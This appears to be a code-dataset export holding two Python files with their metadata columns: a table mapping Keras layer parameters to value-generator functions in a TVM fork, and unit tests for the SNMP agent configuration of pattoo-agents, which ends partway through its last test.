| 0
| 0.809677
| 0
| 0
| 0.096772
| 0.023408
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0
| 0.087097
| 0
| 0.158065
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c04633a61e9e6ceb7163f805b7867cd05afc285c
| 27,812
|
py
|
Python
|
apps/layers_dataset/layers_param_data.py
|
new-TonyWang/tvm
|
6b9f0abf935cbed82480326460eaaeb1a95bf9ca
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
apps/layers_dataset/layers_param_data.py
|
new-TonyWang/tvm
|
6b9f0abf935cbed82480326460eaaeb1a95bf9ca
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
apps/layers_dataset/layers_param_data.py
|
new-TonyWang/tvm
|
6b9f0abf935cbed82480326460eaaeb1a95bf9ca
|
[
"Zlib",
"Unlicense",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0"
] | null | null | null |
from generate_param_value import *

"""
保存了所有算子的参数和其值的生成函数的对应关系,如果不需要增加新算子则不需要修改
"""
# global_table maps each supported Keras layer / merge-function name to a dict
# of {constructor argument name -> value source}.  A value source is one of:
#   * a callable from generate_param_value, invoked to synthesize a value;
#   * a literal (string / bool) used as-is; or
#   * None, meaning the argument is left at its Keras default.
# The 'self' / 'args' / 'kwargs' keys are placeholders for the corresponding
# Python parameters and never have values generated for them.
# (English note for the string above: the table records, for every operator,
# the mapping from its parameters to value-generator functions; it only needs
# editing when a new operator is added.)
#
# Fix applied: 'GRU' previously mapped 'dropout' and 'recurrent_dropout' to
# get_bool; these arguments are float rates in Keras, and the sibling
# 'SimpleRNN' and 'LSTM' entries use get_value — corrected for consistency.
global_table = {
    # ---- Activation layers ----
    'LeakyReLU': {'self': None, 'alpha': get_value, 'kwargs': None},
    'PReLU': {'self': None,
              'alpha_initializer': 'zeros',
              'alpha_regularizer': None,
              'alpha_constraint': None,
              'shared_axes': get_shared_axes,
              'kwargs': None},
    'ELU': {'self': None, 'alpha': get_value, 'kwargs': None},  # default 1.0
    'ThresholdedReLU': {'self': None, 'theta': get_value, 'kwargs': None},  # default 1.0
    'Softmax': {'self': None, 'axis': get_axis, 'kwargs': None},  # default -1

    # ---- Convolution layers ----
    'Conv1D': {'self': None,
               'filters': get_filters,
               'kernel_size': kernel_size_dispatch,
               'strides': get_stride_or_dilation_rate_pool_size,
               'padding': get_padding,
               'data_format': get_data_format,
               'dilation_rate': get_stride_or_dilation_rate_pool_size,
               'groups': get_group,
               'activation': get_activation,
               'use_bias': get_bool,
               'kernel_initializer': 'glorot_uniform',
               'bias_initializer': 'zeros',
               'kernel_regularizer': None,
               'bias_regularizer': None,
               'activity_regularizer': None,
               'kernel_constraint': None,
               'bias_constraint': None,
               'kwargs': None},
    'Conv2D': {'self': None,
               'filters': get_filters,
               'kernel_size': kernel_size_dispatch,
               'strides': get_strides2D_and_dilation_rate_pool_size,
               'padding': get_padding,
               'data_format': get_data_format,
               'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
               'groups': get_group,
               'activation': get_activation,
               'use_bias': get_bool,
               'kernel_initializer': 'glorot_uniform',
               'bias_initializer': 'zeros',
               'kernel_regularizer': None,
               'bias_regularizer': None,
               'activity_regularizer': None,
               'kernel_constraint': None,
               'bias_constraint': None,
               'kwargs': None},
    'Conv3D': {'self': None,
               'filters': get_filters,
               'kernel_size': kernel_size_dispatch,
               'strides': get_strides3D_and_dilation_rate_pool_size,
               'padding': get_padding,
               'data_format': get_data_format,
               'dilation_rate': get_strides3D_and_dilation_rate_pool_size,
               'groups': get_group,
               'activation': get_activation,
               'use_bias': get_bool,
               'kernel_initializer': 'glorot_uniform',
               'bias_initializer': 'zeros',
               'kernel_regularizer': None,
               'bias_regularizer': None,
               'activity_regularizer': None,
               'kernel_constraint': None,
               'bias_constraint': None,
               'kwargs': None},
    'Conv1DTranspose': {'self': None,
                        'filters': get_filters,
                        'kernel_size': kernel_size_dispatch,
                        'strides': get_stride_or_dilation_rate_pool_size,
                        'padding': get_padding,
                        'output_padding': output_padding_dispatch_for_Transpose,
                        'data_format': get_data_format,
                        'dilation_rate': get_stride_or_dilation_rate_pool_size,
                        'activation': get_activation,
                        'use_bias': get_bool,
                        'kernel_initializer': 'glorot_uniform',
                        'bias_initializer': 'zeros',
                        'kernel_regularizer': None,
                        'bias_regularizer': None,
                        'activity_regularizer': None,
                        'kernel_constraint': None,
                        'bias_constraint': None,
                        'kwargs': None},
    'Conv2DTranspose': {'self': None,
                        'filters': get_filters,
                        'kernel_size': kernel_size_dispatch,
                        'strides': get_strides2D_and_dilation_rate_pool_size,
                        'padding': get_padding,
                        'output_padding': output_padding_dispatch_for_Transpose,
                        'data_format': get_data_format,
                        'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
                        'activation': get_activation,
                        'use_bias': get_bool,
                        'kernel_initializer': 'glorot_uniform',
                        'bias_initializer': 'zeros',
                        'kernel_regularizer': None,
                        'bias_regularizer': None,
                        'activity_regularizer': None,
                        'kernel_constraint': None,
                        'bias_constraint': None,
                        'kwargs': None},
    'Conv3DTranspose': {'self': None,
                        'filters': get_filters,
                        'kernel_size': kernel_size_dispatch,
                        'strides': get_strides3D_and_dilation_rate_pool_size,
                        'padding': get_padding,
                        'output_padding': output_padding_dispatch_for_Transpose,
                        'data_format': get_data_format,
                        'dilation_rate': get_strides3D_and_dilation_rate_pool_size,
                        'activation': get_activation,
                        'use_bias': get_bool,
                        'kernel_initializer': 'glorot_uniform',
                        'bias_initializer': 'zeros',
                        'kernel_regularizer': None,
                        'bias_regularizer': None,
                        'activity_regularizer': None,
                        'kernel_constraint': None,
                        'bias_constraint': None,
                        'kwargs': None},
    'SeparableConv1D': {'self': None,
                        'filters': get_filters,
                        'kernel_size': kernel_size_dispatch,
                        'strides': get_stride_or_dilation_rate_pool_size,
                        'padding': get_padding,
                        'data_format': get_data_format,
                        'dilation_rate': get_stride_or_dilation_rate_pool_size,
                        'depth_multiplier': get_depth_multiplier,
                        'activation': get_activation,
                        'use_bias': get_bool,
                        'depthwise_initializer': 'glorot_uniform',
                        'pointwise_initializer': 'glorot_uniform',
                        'bias_initializer': 'zeros',
                        'depthwise_regularizer': None,
                        'pointwise_regularizer': None,
                        'bias_regularizer': None,
                        'activity_regularizer': None,
                        'depthwise_constraint': None,
                        'pointwise_constraint': None,
                        'bias_constraint': None,
                        'kwargs': None},
    'SeparableConv2D': {'self': None,
                        'filters': get_filters,
                        'kernel_size': kernel_size_dispatch,
                        'strides': get_strides2D_and_dilation_rate_pool_size,
                        'padding': get_padding,
                        'data_format': get_data_format,
                        'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
                        'depth_multiplier': get_depth_multiplier,
                        'activation': get_activation,
                        'use_bias': get_bool,
                        'depthwise_initializer': 'glorot_uniform',
                        'pointwise_initializer': 'glorot_uniform',
                        'bias_initializer': 'zeros',
                        'depthwise_regularizer': None,
                        'pointwise_regularizer': None,
                        'bias_regularizer': None,
                        'activity_regularizer': None,
                        'depthwise_constraint': None,
                        'pointwise_constraint': None,
                        'bias_constraint': None,
                        'kwargs': None},
    'DepthwiseConv2D': {'self': None,
                        'kernel_size': kernel_size_dispatch,
                        'strides': get_strides2D_and_dilation_rate_pool_size,
                        'padding': get_padding,
                        'depth_multiplier': get_depth_multiplier,
                        'data_format': get_data_format,
                        'dilation_rate': get_strides2D_and_dilation_rate_pool_size,
                        'activation': get_activation,
                        'use_bias': get_bool,
                        'depthwise_initializer': 'glorot_uniform',
                        'bias_initializer': 'zeros',
                        'depthwise_regularizer': None,
                        'bias_regularizer': None,
                        'activity_regularizer': None,
                        'depthwise_constraint': None,
                        'bias_constraint': None,
                        'kwargs': None},

    # ---- Resizing / padding / cropping layers ----
    'UpSampling1D': {'self': None, 'size': get_size1D_and_padding, 'kwargs': None},
    'UpSampling2D': {'self': None,
                     'size': get_size2D_and_padding,
                     'data_format': get_data_format,
                     'interpolation': get_interpolation,
                     'kwargs': None},
    'UpSampling3D': {'self': None,
                     'size': get_size3D_and_padding,
                     'data_format': get_data_format,
                     'kwargs': None},
    'ZeroPadding1D': {'self': None, 'padding': get_size1D_and_padding, 'kwargs': None},
    'ZeroPadding2D': {'self': None,
                      'padding': get_size2D_and_padding,
                      'data_format': get_data_format,
                      'kwargs': None},
    'ZeroPadding3D': {'self': None,
                      'padding': get_size3D_and_padding,
                      'data_format': get_data_format,
                      'kwargs': None},
    'Cropping1D': {'self': None, 'cropping': get_croping1D, 'kwargs': None},
    'Cropping2D': {'self': None,
                   'cropping': get_croping2D,
                   'data_format': get_data_format,
                   'kwargs': None},
    'Cropping3D': {'self': None,
                   'cropping': get_croping3D,
                   'data_format': get_data_format,
                   'kwargs': None},
    'Masking': {'self': None, 'mask_value': get_value, 'kwargs': None},

    # NOTE: Dropout, SpatialDropout1D/2D/3D, Lambda, AlphaDropout, RNN,
    # AbstractRNNCell, StackedRNNCells, SimpleRNNCell, GRUCell, LSTMCell and
    # ConvLSTM2D are intentionally excluded from generation.

    # ---- Shape / misc layers ----
    'Activation': {'self': None, 'activation': get_activation, 'kwargs': None},
    'Reshape': {'self': None, 'target_shape': get_target_shape, 'kwargs': None},
    'Permute': {'self': None, 'dims': get_next_permute, 'kwargs': None},
    'Flatten': {'self': None, 'data_format': get_data_format, 'kwargs': None},
    'RepeatVector': {'self': None, 'n': get_value, 'kwargs': None},
    'Dense': {'self': None,
              'units': get_units,
              'activation': get_activation,
              'use_bias': get_bool,
              'kernel_initializer': 'glorot_uniform',
              'bias_initializer': 'zeros',
              'kernel_regularizer': None,
              'bias_regularizer': None,
              'activity_regularizer': None,
              'kernel_constraint': None,
              'bias_constraint': None,
              'kwargs': None},
    'ActivityRegularization': {'self': None, 'l1': get_value, 'l2': get_value, 'kwargs': None},
    # use_scale is deliberately pinned to True here (unlike 'Attention').
    'AdditiveAttention': {'self': None, 'use_scale': True, 'kwargs': None},
    'Attention': {'self': None, 'use_scale': get_bool, 'kwargs': None},
    'Embedding': {'self': None,
                  'input_dim': get_value,
                  'output_dim': get_value,
                  'embeddings_initializer': 'uniform',
                  'embeddings_regularizer': None,
                  'activity_regularizer': None,
                  'embeddings_constraint': None,
                  'mask_zero': get_bool,
                  'input_length': get_value,
                  'kwargs': None},
    'LocallyConnected1D': {'self': None,
                           'filters': get_filters,
                           'kernel_size': kernel_size_dispatch,
                           'strides': get_stride_or_dilation_rate_pool_size,
                           'padding': get_padding,
                           'data_format': get_data_format,
                           'activation': get_activation,
                           'use_bias': get_bool,
                           'kernel_initializer': 'glorot_uniform',
                           'bias_initializer': 'zeros',
                           'kernel_regularizer': None,
                           'bias_regularizer': None,
                           'activity_regularizer': None,
                           'kernel_constraint': None,
                           'bias_constraint': None,
                           'implementation': get_implementation,
                           'kwargs': None},
    'LocallyConnected2D': {'self': None,
                           'filters': get_filters,
                           'kernel_size': kernel_size_dispatch,
                           'strides': get_strides2D_and_dilation_rate_pool_size,
                           'padding': get_padding,
                           'data_format': get_data_format,
                           'activation': get_activation,
                           'use_bias': get_bool,
                           'kernel_initializer': 'glorot_uniform',
                           'bias_initializer': 'zeros',
                           'kernel_regularizer': None,
                           'bias_regularizer': None,
                           'activity_regularizer': None,
                           'kernel_constraint': None,
                           'bias_constraint': None,
                           'implementation': get_implementation,
                           'kwargs': None},

    # ---- Merge layers (class form) ----
    'Add': {'self': None, 'kwargs': None},
    'Subtract': {'self': None, 'kwargs': None},
    'Multiply': {'self': None, 'kwargs': None},
    'Average': {'self': None, 'kwargs': None},
    'Maximum': {'self': None, 'kwargs': None},
    'Minimum': {'self': None, 'kwargs': None},
    'Concatenate': {'self': None, 'axis': get_axis, 'kwargs': None},  # default -1
    'Dot': {'self': None, 'axes': get_axes, 'normalize': get_bool, 'kwargs': None},

    # ---- Merge layers (functional form) ----
    'add': {'args': None, 'kwargs': None},
    'subtract': {'args': None, 'kwargs': None},
    'multiply': {'args': None, 'kwargs': None},
    'average': {'args': None, 'kwargs': None},
    'maximum': {'args': None, 'kwargs': None},
    'minimum': {'args': None, 'kwargs': None},
    'concatenate': {'args': None, 'kwargs': None},
    'dot': {'args': None, 'kwargs': None},

    # ---- Noise / normalization layers ----
    'GaussianNoise': {'self': None, 'stddev': get_value, 'kwargs': None},
    'GaussianDropout': {'self': None, 'rate': get_value, 'kwargs': None},
    'LayerNormalization': {'self': None,
                           'axis': get_axis,          # default -1
                           'epsilon': get_epsilon,    # default 0.001
                           'center': get_bool,
                           'scale': get_bool,
                           'beta_initializer': 'zeros',
                           'gamma_initializer': 'ones',
                           'beta_regularizer': None,
                           'gamma_regularizer': None,
                           'beta_constraint': None,
                           'gamma_constraint': None,
                           'trainable': True,
                           'name': None,
                           'kwargs': None},
    'BatchNormalization': {'self': None,
                           'axis': get_axis,          # default -1
                           'momentum': get_value,     # default 0.99
                           'epsilon': get_epsilon,    # default 0.001
                           'center': get_bool,
                           'scale': get_bool,
                           'beta_initializer': 'zeros',
                           'gamma_initializer': 'ones',
                           'moving_mean_initializer': 'zeros',
                           'moving_variance_initializer': 'ones',
                           'beta_regularizer': None,
                           'gamma_regularizer': None,
                           'beta_constraint': None,
                           'gamma_constraint': None,
                           'renorm': get_bool,
                           'renorm_clipping': None,
                           'renorm_momentum': get_value,  # default 0.99
                           'fused': None,
                           'trainable': True,
                           'virtual_batch_size': None,
                           'adjustment': None,
                           'name': None,
                           'kwargs': None},

    # ---- Pooling layers ----
    'MaxPooling1D': {'self': None,
                     'pool_size': get_stride_or_dilation_rate_pool_size,
                     'strides': get_stride_or_dilation_rate_pool_size,
                     'padding': get_padding,
                     'data_format': get_data_format,
                     'kwargs': None},
    'MaxPooling2D': {'self': None,
                     'pool_size': get_strides2D_and_dilation_rate_pool_size,
                     'strides': get_strides2D_and_dilation_rate_pool_size,
                     'padding': get_padding,
                     'data_format': get_data_format,
                     'kwargs': None},
    'MaxPooling3D': {'self': None,
                     'pool_size': get_strides3D_and_dilation_rate_pool_size,
                     'strides': get_strides3D_and_dilation_rate_pool_size,
                     'padding': get_padding,
                     'data_format': get_data_format,
                     'kwargs': None},
    'AveragePooling1D': {'self': None,
                         'pool_size': get_stride_or_dilation_rate_pool_size,
                         'strides': get_stride_or_dilation_rate_pool_size,
                         'padding': get_padding,
                         'data_format': get_data_format,
                         'kwargs': None},
    'AveragePooling2D': {'self': None,
                         'pool_size': get_strides2D_and_dilation_rate_pool_size,
                         'strides': get_strides2D_and_dilation_rate_pool_size,
                         'padding': get_padding,
                         'data_format': get_data_format,
                         'kwargs': None},
    'AveragePooling3D': {'self': None,
                         'pool_size': get_strides3D_and_dilation_rate_pool_size,
                         'strides': get_strides3D_and_dilation_rate_pool_size,
                         'padding': get_padding,
                         'data_format': get_data_format,
                         'kwargs': None},
    'GlobalAveragePooling1D': {'self': None, 'data_format': get_data_format, 'kwargs': None},
    'GlobalAveragePooling2D': {'self': None, 'data_format': get_data_format, 'kwargs': None},
    'GlobalAveragePooling3D': {'self': None, 'data_format': get_data_format, 'kwargs': None},
    'GlobalMaxPooling1D': {'self': None, 'data_format': get_data_format, 'kwargs': None},
    'GlobalMaxPooling2D': {'self': None, 'data_format': get_data_format, 'kwargs': None},
    'GlobalMaxPooling3D': {'self': None, 'data_format': get_data_format, 'kwargs': None},

    # ---- Recurrent layers ----
    'SimpleRNN': {'self': None,
                  'units': get_units,
                  'activation': get_activation,
                  'use_bias': get_bool,
                  'kernel_initializer': 'glorot_uniform',
                  'recurrent_initializer': 'orthogonal',
                  'bias_initializer': 'zeros',
                  'kernel_regularizer': None,
                  'recurrent_regularizer': None,
                  'bias_regularizer': None,
                  'activity_regularizer': None,
                  'kernel_constraint': None,
                  'recurrent_constraint': None,
                  'bias_constraint': None,
                  'dropout': get_value,
                  'recurrent_dropout': get_value,
                  'return_sequences': get_bool,
                  'return_state': get_bool,
                  'go_backwards': get_bool,
                  'stateful': get_bool,
                  'unroll': get_bool,
                  'kwargs': None},
    'GRU': {'self': None,
            'units': get_units,
            'activation': get_activation,
            'recurrent_activation': get_activation,
            'use_bias': get_bool,
            'kernel_initializer': 'glorot_uniform',
            'recurrent_initializer': 'orthogonal',
            'bias_initializer': 'zeros',
            'kernel_regularizer': None,
            'recurrent_regularizer': None,
            'bias_regularizer': None,
            'activity_regularizer': None,
            'kernel_constraint': None,
            'recurrent_constraint': None,
            'bias_constraint': None,
            # dropout rates are floats in [0, 1), not booleans — was get_bool.
            'dropout': get_value,
            'recurrent_dropout': get_value,
            'implementation': get_implementation,
            'return_sequences': get_bool,
            'return_state': get_bool,
            'go_backwards': get_bool,
            'stateful': get_bool,
            'unroll': get_bool,
            'time_major': get_bool,
            'reset_after': get_bool,
            'kwargs': None},
    'LSTM': {'self': None,
             'units': get_units,
             'activation': get_activation,
             'recurrent_activation': get_activation,
             'use_bias': get_bool,
             'kernel_initializer': 'glorot_uniform',
             'recurrent_initializer': 'orthogonal',
             'bias_initializer': 'zeros',
             'unit_forget_bias': get_bool,
             'kernel_regularizer': None,
             'recurrent_regularizer': None,
             'bias_regularizer': None,
             'activity_regularizer': None,
             'kernel_constraint': None,
             'recurrent_constraint': None,
             'bias_constraint': None,
             'dropout': get_value,
             'recurrent_dropout': get_value,
             'implementation': get_implementation,
             'return_sequences': get_bool,
             'return_state': get_bool,
             'go_backwards': get_bool,
             'stateful': get_bool,
             'time_major': get_bool,
             'unroll': get_bool,
             'kwargs': None},
}
| 38.627778
| 80
| 0.479038
| 2,179
| 27,812
| 5.751262
| 0.094998
| 0.067028
| 0.036866
| 0.051069
| 0.782397
| 0.767316
| 0.751835
| 0.741143
| 0.736355
| 0.693505
| 0
| 0.006753
| 0.403639
| 27,812
| 719
| 81
| 38.681502
| 0.748824
| 0.177118
| 0
| 0.763672
| 1
| 0
| 0.285387
| 0.023746
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001953
| 0
| 0.001953
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
22414412694ba19cf4d0ea9aa5e81514793b492f
| 15,412
|
py
|
Python
|
tests/test_pattoo_agents/snmp/test_configuration.py
|
palisadoes/pattoo-agents
|
d73453ceac1747573dfbcad4da724325e86b208d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pattoo_agents/snmp/test_configuration.py
|
palisadoes/pattoo-agents
|
d73453ceac1747573dfbcad4da724325e86b208d
|
[
"Apache-2.0"
] | null | null | null |
tests/test_pattoo_agents/snmp/test_configuration.py
|
palisadoes/pattoo-agents
|
d73453ceac1747573dfbcad4da724325e86b208d
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
"""Test the class_oid module."""
import sys
import unittest
import os
# Try to create a working PYTHONPATH so the project's own packages are
# imported in preference to any pip-installed copies.
# EXEC_DIR: the directory containing this test file.
EXEC_DIR = os.path.dirname(os.path.realpath(__file__))
# ROOT_DIR: three levels up from EXEC_DIR — the repository root.
ROOT_DIR = os.path.abspath(os.path.join(
    os.path.abspath(os.path.join(
        os.path.abspath(os.path.join(
            EXEC_DIR, os.pardir)), os.pardir)), os.pardir))
# The path suffix this file is expected to live under, built with os.sep so
# the check works on any OS.
_EXPECTED = (
    '{0}pattoo-agents{0}tests{0}test_pattoo_agents{0}snmp'.format(os.sep))
if EXEC_DIR.endswith(_EXPECTED) is True:
    # We need to prepend the path in case PattooShared has been installed
    # elsewhere on the system using PIP. This could corrupt expected results
    sys.path.insert(0, ROOT_DIR)
else:
    # Refuse to run from an unexpected location; exit code 2 signals misuse.
    print('''This script is not installed in the "{0}" directory. Please fix.\
'''.format(_EXPECTED))
    sys.exit(2)
# Pattoo imports
from pattoo_shared.variables import PollingPoint, TargetPollingPoints
from pattoo_agents.snmp import configuration
from pattoo_agents.snmp.variables import SNMPVariable
from tests.libraries.configuration import UnittestConfig
class TestConfigSNMP(unittest.TestCase):
"""Checks all ConfigSNMP methods."""
##########################################################################
# Initialize variable class
##########################################################################
config = configuration.ConfigSNMP()
    def test___init__(self):
        """Testing function __init__."""
        # No assertions needed: the shared ConfigSNMP instance is created once
        # at class level, so a construction failure would surface there.
        pass
def test_polling_interval(self):
"""Test pattoo_shared.Config inherited method polling_interval."""
# Initialize key values
expected = 912
# Test
result = self.config.polling_interval()
self.assertEqual(result, expected)
def test_snmpvariables(self):
"""Testing function snmpvariables."""
# Initialize key variables
result = self.config.snmpvariables()
# Test
self.assertEqual(isinstance(result, list), True)
self.assertEqual(len(result), 1)
# Test the only SNMPVariable in the result
snmpvariable = result[0]
self.assertEqual(isinstance(snmpvariable, SNMPVariable), True)
authvariable = snmpvariable.snmpauth
self.assertEqual(authvariable.community, '8gfljtrwer')
self.assertEqual(authvariable.port, 161)
self.assertEqual(authvariable.version, 2)
self.assertEqual(authvariable.authpassword, None)
self.assertEqual(authvariable.authprotocol, None)
self.assertEqual(authvariable.privpassword, None)
self.assertEqual(authvariable.privprotocol, None)
self.assertEqual(authvariable.secname, None)
def test_target_polling_points(self):
"""Testing function target_polling_points."""
# Initialize key variables.
result = self.config.target_polling_points()
oids = ['.1.3.6.1.2.1.2.2.1.10', '.1.3.6.1.2.1.2.2.1.16']
# Test
self.assertEqual(isinstance(result, list), True)
self.assertEqual(len(result), 1)
# Test each dpt
item = result[0]
self.assertEqual(isinstance(item, TargetPollingPoints), True)
self.assertEqual(item.target, 'localhost')
for index, value in enumerate(item.data):
self.assertEqual(isinstance(value, PollingPoint), True)
self.assertEqual(value.address, oids[index])
self.assertEqual(value.multiplier, 8)
def test_language(self):
"""Test pattoo_shared.Config inherited method language."""
# Initialize key values
expected = 'abc'
# Test
result = self.config.language()
self.assertEqual(result, expected)
def test_agent_api_ip_address(self):
"""Test pattoo_shared.Config inherited method agent_api_ip_address."""
# Initialize key values
expected = '127.0.0.11'
# Test
result = self.config.agent_api_ip_address()
self.assertEqual(result, expected)
def test_agent_api_ip_bind_port(self):
"""Test pattoo_shared.Config inherited method agent_api_ip_bind_port."""
# Initialize key values
expected = 50001
# Test
result = self.config.agent_api_ip_bind_port()
self.assertEqual(result, expected)
def test_agent_api_uri(self):
"""Test pattoo_shared.Config inherited method api_uri."""
# Initialize key values
expected = '/pattoo/api/v1/agent/receive'
# Test
result = self.config.agent_api_uri()
self.assertEqual(result, expected)
def test_agent_api_server_url(self):
"""Test pattoo_shared.Config inherited method agent_api_server_url."""
# Initialize key values
expected = 'http://127.0.0.11:50001/pattoo/api/v1/agent/receive/123'
agent_id = 123
# Test
result = self.config.agent_api_server_url(agent_id)
self.assertEqual(result, expected)
def test_web_api_ip_address(self):
"""Testing method / function web_api_ip_address."""
# Test
result = self.config.web_api_ip_address()
self.assertEqual(result, '127.0.0.12')
def test_web_api_ip_bind_port(self):
"""Testing method / function web_api_ip_bind_port."""
# Test
result = self.config.web_api_ip_bind_port()
self.assertEqual(result, 50002)
def test_web_api_server_url(self):
"""Testing method / function web_api_server_url."""
# Test
result = self.config.web_api_server_url()
self.assertEqual(
result, 'http://127.0.0.12:50002/pattoo/api/v1/web/graphql')
def test_daemon_directory(self):
"""Test pattoo_shared.Config inherited method daemon_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.daemon_directory()
def test_log_directory(self):
"""Test pattoo_shared.Config inherited method log_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.log_directory()
def test_log_file(self):
"""Test pattoo_shared.Config inherited method log_file."""
# Initialize key values
expected = '{1}{0}pattoo.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file()
self.assertEqual(result, expected)
def test_log_file_api(self):
"""Test pattoo_shared.Config inherited method log_file_api."""
# Initialize key values
expected = '{1}{0}pattoo-api.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file_api()
self.assertEqual(result, expected)
def test_log_level(self):
"""Test pattoo_shared.Config inherited method log_level."""
# Initialize key values
expected = 'debug'
# Test
result = self.config.log_level()
self.assertEqual(result, expected)
def test_log_file_daemon(self):
"""Test pattoo_shared.Config inherited method log_file_daemon."""
# Initialize key values
expected = '{1}{0}pattoo-daemon.log'.format(
os.sep, self.config.log_directory())
# Test
result = self.config.log_file_daemon()
self.assertEqual(result, expected)
def test_cache_directory(self):
"""Test pattoo_shared.Config inherited method cache_directory."""
# Nothing should happen. Directory exists in testing.
_ = self.config.cache_directory()
def test_agent_cache_directory(self):
"""Test pattoo_shared.Config inherited method agent_cache_directory."""
# Initialize key values
agent_id = 123
expected = '{1}{0}{2}'.format(
os.sep, self.config.cache_directory(), agent_id)
# Test
result = self.config.agent_cache_directory(agent_id)
self.assertEqual(result, expected)
class TestConfigSNMPIfMIB(unittest.TestCase):
    """Checks all ConfigSNMPIfMIB methods."""

    ##########################################################################
    # Initialize variable class
    ##########################################################################
    config = configuration.ConfigSNMPIfMIB()

    def test___init__(self):
        """Testing function __init__."""
        pass

    def test_polling_interval(self):
        """Test pattoo_shared.Config inherited method polling_interval."""
        # The unittest configuration fixes the polling interval at 7846.
        self.assertEqual(self.config.polling_interval(), 7846)

    def test_snmpvariables(self):
        """Testing function snmpvariables."""
        variables = self.config.snmpvariables()

        # Exactly one SNMPVariable must be configured.
        self.assertIsInstance(variables, list)
        self.assertEqual(len(variables), 1)

        # Verify the authentication parameters. SNMPv3 is configured,
        # so the community string is None and the v3 fields are set.
        variable = variables[0]
        self.assertIsInstance(variable, SNMPVariable)
        auth = variable.snmpauth
        self.assertIsNone(auth.community)
        self.assertEqual(auth.port, 161)
        self.assertEqual(auth.version, 3)
        self.assertEqual(auth.authpassword, '092df34')
        self.assertEqual(auth.authprotocol, 'MD5')
        self.assertEqual(auth.privpassword, '987dee1234')
        self.assertEqual(auth.privprotocol, 'DES')
        self.assertEqual(auth.secname, '0981s23df')

    def test_target_polling_points(self):
        """Testing function target_polling_points."""
        expected_oids = ['.1.3.6.1.2.1.2.2.1.14', '.1.3.6.1.2.1.2.2.1.20']
        polling_targets = self.config.target_polling_points()

        # Exactly one polling target must be configured.
        self.assertIsInstance(polling_targets, list)
        self.assertEqual(len(polling_targets), 1)

        # The target is localhost; every polling point pairs the
        # expected OID with a multiplier of 8.
        target = polling_targets[0]
        self.assertIsInstance(target, TargetPollingPoints)
        self.assertEqual(target.target, 'localhost')
        for position, point in enumerate(target.data):
            self.assertIsInstance(point, PollingPoint)
            self.assertEqual(point.address, expected_oids[position])
            self.assertEqual(point.multiplier, 8)

    def test_language(self):
        """Test pattoo_shared.Config inherited method language."""
        self.assertEqual(self.config.language(), 'abc')

    def test_agent_api_ip_address(self):
        """Test pattoo_shared.Config inherited method agent_api_ip_address."""
        self.assertEqual(self.config.agent_api_ip_address(), '127.0.0.11')

    def test_agent_api_ip_bind_port(self):
        """Test pattoo_shared.Config inherited method agent_api_ip_bind_port."""
        self.assertEqual(self.config.agent_api_ip_bind_port(), 50001)

    def test_agent_api_uri(self):
        """Test pattoo_shared.Config inherited method api_uri."""
        self.assertEqual(
            self.config.agent_api_uri(), '/pattoo/api/v1/agent/receive')

    def test_agent_api_server_url(self):
        """Test pattoo_shared.Config inherited method agent_api_server_url."""
        # The agent ID is appended to the agent receive URI.
        result = self.config.agent_api_server_url(123)
        self.assertEqual(
            result,
            'http://127.0.0.11:50001/pattoo/api/v1/agent/receive/123')

    def test_web_api_ip_address(self):
        """Testing method / function web_api_ip_address."""
        self.assertEqual(self.config.web_api_ip_address(), '127.0.0.12')

    def test_web_api_ip_bind_port(self):
        """Testing method / function web_api_ip_bind_port."""
        self.assertEqual(self.config.web_api_ip_bind_port(), 50002)

    def test_web_api_server_url(self):
        """Testing method / function web_api_server_url."""
        self.assertEqual(
            self.config.web_api_server_url(),
            'http://127.0.0.12:50002/pattoo/api/v1/web/graphql')

    def test_daemon_directory(self):
        """Test pattoo_shared.Config inherited method daemon_directory."""
        # Must not raise. Directory exists in testing.
        _ = self.config.daemon_directory()

    def test_log_directory(self):
        """Test pattoo_shared.Config inherited method log_directory."""
        # Must not raise. Directory exists in testing.
        _ = self.config.log_directory()

    def test_log_file(self):
        """Test pattoo_shared.Config inherited method log_file."""
        expected = '{1}{0}pattoo.log'.format(
            os.sep, self.config.log_directory())
        self.assertEqual(self.config.log_file(), expected)

    def test_log_file_api(self):
        """Test pattoo_shared.Config inherited method log_file_api."""
        expected = '{1}{0}pattoo-api.log'.format(
            os.sep, self.config.log_directory())
        self.assertEqual(self.config.log_file_api(), expected)

    def test_log_level(self):
        """Test pattoo_shared.Config inherited method log_level."""
        self.assertEqual(self.config.log_level(), 'debug')

    def test_log_file_daemon(self):
        """Test pattoo_shared.Config inherited method log_file_daemon."""
        expected = '{1}{0}pattoo-daemon.log'.format(
            os.sep, self.config.log_directory())
        self.assertEqual(self.config.log_file_daemon(), expected)

    def test_cache_directory(self):
        """Test pattoo_shared.Config inherited method cache_directory."""
        # Must not raise. Directory exists in testing.
        _ = self.config.cache_directory()

    def test_agent_cache_directory(self):
        """Test pattoo_shared.Config inherited method agent_cache_directory."""
        agent_id = 123
        expected = '{1}{0}{2}'.format(
            os.sep, self.config.cache_directory(), agent_id)
